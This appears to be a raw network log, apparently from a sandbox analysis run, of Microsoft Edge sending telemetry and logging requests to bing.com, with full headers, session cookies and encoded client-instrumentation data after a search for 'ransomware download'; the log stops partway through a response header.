cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: BD670AD793AF465BAF109951E5F66EB0 Ref B: LON04EDGE0922 Ref C: 2024-02-29T15:32:32Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:32 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220752.b326e22
-
Remote address:92.123.128.152:443RequestPOST /fd/ls/lsp.aspx? HTTP/2.0
host: www.bing.com
content-length: 343
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 22A4DAB61ACC447AA1A4701E9044BA3D Ref B: LTSEDGE1612 Ref C: 2024-02-29T15:32:32Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:32 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220752.b326e25
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1709220749187%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22200%22%2C%22Downlink%22%3A%2210%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1709220749187%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220749202%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220749204%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22609%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220749204%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220749204%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220749204%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1709220749204%2C%22Name%22%3A86%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22Namespace%22%3A%22SuperappConnector%22%2C%22CustomData%22%3A%22%7B%5C%22sysMsg%5C%22%3A%5C%22file%20loaded%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220749204%2C%22Name%22%3A%22Global%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220749231%2C%22Name%22%3A%22VisibleOrDelayed%22%2C%22FID%22%3A%22BottomBanner%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220749231%2C%22Name%22%3A%22BottomBanner%22%2C%22FID%22%3A%22Mcp%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1709220749231%2C%22Name%22%3A%22bnp.notif.shown%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1709220749231%2C%22Name%22%3A%22bnp.embed.ready%22%2C%22FID%22%3A%2263245%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1709220749187%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22200%22%2C%22Downlink%22%3A%2210%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1709220749187%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220749202%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220749204%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22609%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220749204%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220749204%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220749204%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1709220749204%2C%22Name%22%3A86%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22Namespace%22%3A%22SuperappConnector%22%2C%22CustomData%22%3A%22%7B%5C%22sysMsg%5C%22%3A%5C%22file%20loaded%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220749204%2C%22Name%22%3A%22Global%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220749231%2C%22Name%22%3A%22VisibleOrDelayed%22%2C%22FID%22%3A%22BottomBanner%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220749231%2C%22Name%22%3A%22BottomBanner%22%2C%22FID%22%3A%22Mcp%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1709220749231%2C%22Name%22%3A%22bnp.notif.shown%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1709220749231%2C%22Name%22%3A%22bnp.embed.ready%22%2C%22FID%22%3A%2263245%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 4A955F9C8A204D1FA28DA1F9A3BE1AFE Ref B: LON04EDGE0713 Ref C: 2024-02-29T15:32:32Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:32 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220752.b326e21
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22ClientDimNotSent%22,%22Text%22:%221%22}]msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22ClientDimNotSent%22,%22Text%22:%221%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: E495DA4EBF1244F5B34FB1F30D7F6888 Ref B: LON04EDGE0710 Ref C: 2024-02-29T15:32:32Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:32 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220752.b326e20
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22HasRR%22,%22Text%22:%221%22}]msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22HasRR%22,%22Text%22:%221%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 16649D99103B41A39A6D9A9D0513AEC7 Ref B: LTSEDGE1006 Ref C: 2024-02-29T15:32:32Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:32 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220752.b326fa2
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.MiniTP%22,%22FID%22:%22CI%22,%22Name%22:%22MiniTp%22,%22Text%22:%22show%22}]msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.MiniTP%22,%22FID%22:%22CI%22,%22Name%22:%22MiniTp%22,%22Text%22:%22show%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: E5F55E0B2063468981086F2F4CDD6A6C Ref B: LTSEDGE1612 Ref C: 2024-02-29T15:32:32Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:32 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220752.b326fac
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.MiniTP%22,%22FID%22:%22CI%22,%22Name%22:%22FullTP%22,%22Text%22:%22show%22}]msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.MiniTP%22,%22FID%22:%22CI%22,%22Name%22:%22FullTP%22,%22Text%22:%22show%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 200
content-type: text/html; charset=utf-8
cache-control: private
content-encoding: br
vary: Accept-Encoding
x-eventid: 65e0a39094e94f039d05094d42eacbc9
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
